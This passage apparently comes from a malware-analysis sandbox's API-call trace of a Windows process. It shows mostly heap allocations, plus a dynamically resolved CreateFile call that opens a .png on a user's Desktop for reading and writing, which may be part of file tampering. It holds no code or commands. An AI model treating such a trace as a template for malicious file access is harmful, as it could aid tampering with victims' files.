lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0165.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0165.458] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0165.458] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.458] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0165.458] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0165.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0165.459] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0165.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0165.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0165.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0165.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0165.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0165.462] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0165.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0165.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.465] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0165.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd468 [0165.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd468, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0165.465] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4egakohibj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0165.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0165.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0165.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0165.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0165.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0165.468] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.468] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0165.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.468] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0165.469] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.469] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 